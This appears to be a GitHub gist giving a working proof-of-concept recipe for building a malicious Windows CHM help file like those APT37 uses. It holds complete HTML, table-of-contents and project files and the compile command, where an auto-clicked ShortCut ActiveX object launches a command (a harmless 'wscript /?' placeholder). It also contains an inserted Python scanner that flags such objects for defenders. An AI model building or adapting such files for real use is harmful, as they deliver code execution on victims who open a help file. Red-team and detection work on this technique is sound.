@nasbench
Last active April 12, 2023 12:45
Malicious CHM - Proof of Concept

Here are the steps to follow in order to create a malicious CHM file of the kind used by APT37.

  • Download the HTML Help Workshop (Htmlhelp.exe) from MSDN. If the link is dead, you can use the archive version here.
  • Once installed, you should have a folder C:\Program Files (x86)\HTML Help Workshop containing the Microsoft HTML Help Compiler (hhc.exe).
  • We need to create 3 files:
    • Project File .hpp
    • HTML File .htm
    • Table of Contents File .hhc

Malicious HTML

This document uses the CLSID {ADB880A6-D8FF-11CF-9377-00AA003B7A11} together with the ShortCut command (Read More). When the object is clicked, it executes the command wscript with the argument /?.

Note

The CLSID {52A2AAAE-085D-4187-97EA-8C30DB990436} can also be used instead. Read more here.

Filename: poc-chm.htm

<HTML>
<HEAD>
	<META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=UTF-8">
</HEAD>
<BODY>
<h2>POC Malicious CHM</h2>
<OBJECT id=poc classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
    <PARAM name="Command" value="ShortCut">
    <PARAM name="Button" value="Bitmap::shortcut">
    <PARAM name="Item1" value=',wscript,/?'>
    <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
poc.Click();
</SCRIPT>

</BODY>
</HTML>
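
As an added example (not part of the gist), the following Python scanner takes the defender's view of the page above: given an .htm page extracted from a CHM, it flags any <OBJECT> whose classid is one of the two CLSIDs named in this gist and that carries a Command=ShortCut parameter, and reports the Item1 command line for triage. The sample input is constructed from the PoC HTML above plus a benign sitemap object.

```python
from html.parser import HTMLParser

# Both CLSIDs named in the gist; matched case-insensitively, with the
# "clsid:" prefix and any braces stripped first.
SHORTCUT_CLSIDS = {
    "adb880a6-d8ff-11cf-9377-00aa003b7a11",
    "52a2aaae-085d-4187-97ea-8c30db990436",
}

class ShortcutObjectScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._obj = None  # clsid and params of the <OBJECT> currently open

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # html.parser lowercases names
        if tag == "object":
            clsid = a.get("classid", "").lower().replace("clsid:", "").strip("{}")
            self._obj = {"clsid": clsid, "params": {}}
        elif tag == "param" and self._obj is not None:  # <PARAM> is a void tag
            self._obj["params"][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag != "object" or self._obj is None:
            return
        obj, self._obj = self._obj, None
        p = obj["params"]
        if obj["clsid"] in SHORTCUT_CLSIDS and p.get("command", "").lower() == "shortcut":
            # Item1 holds the program and arguments launched on Click().
            self.findings.append({"clsid": obj["clsid"], "item1": p.get("item1", "")})

def scan_html(html):
    """Return [{clsid, item1}, ...] for every ShortCut object found in html."""
    scanner = ShortcutObjectScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample: the gist's poc-chm.htm object plus a benign sitemap object.
SAMPLE = """<HTML><BODY>
<OBJECT id=poc classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
    <PARAM name="Command" value="ShortCut">
    <PARAM name="Item1" value=',wscript,/?'>
</OBJECT>
<OBJECT type="text/sitemap"><param name="Local" value="poc-chm.htm"></OBJECT>
</BODY></HTML>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE):
        print(f"ShortCut object {f['clsid']} launches: {f['item1']}")
```

The same check can be run over every .htm extracted from a suspicious CHM (for example with 7-Zip or hh.exe -decompile) to surface the command line before the file is ever opened.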

CHM Table of Contents

The table of contents references the HTML file created above. The path must be reachable relative to the location of the table of contents file. For example, if the HTML file is located inside a folder, the path would be path-to-folder\malicious

Filename: poc-chm.hhc

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
<!-- Sitemap 1.0 -->
</HEAD>
<BODY>
<UL>
	<LI> <OBJECT type="text/sitemap">
		<param name="Name" value="Setting up multiple users">
		<param name="Local" value="poc-chm.htm">
		</OBJECT>
</UL>
</BODY>
</HTML>

Project File

The project file references both the "HTML" file and the "Table of Contents" file.

Filename: poc-chm.hpp

[OPTIONS]
Contents file=poc-chm.hhc
[FILES]
poc-chm.htm

Compilation

Once all files are created and placed in a single folder, execute the following command to compile the CHM, and enjoy.

"C:\Program Files (x86)\HTML Help Workshop\hhc.exe" poc-chm.hpp
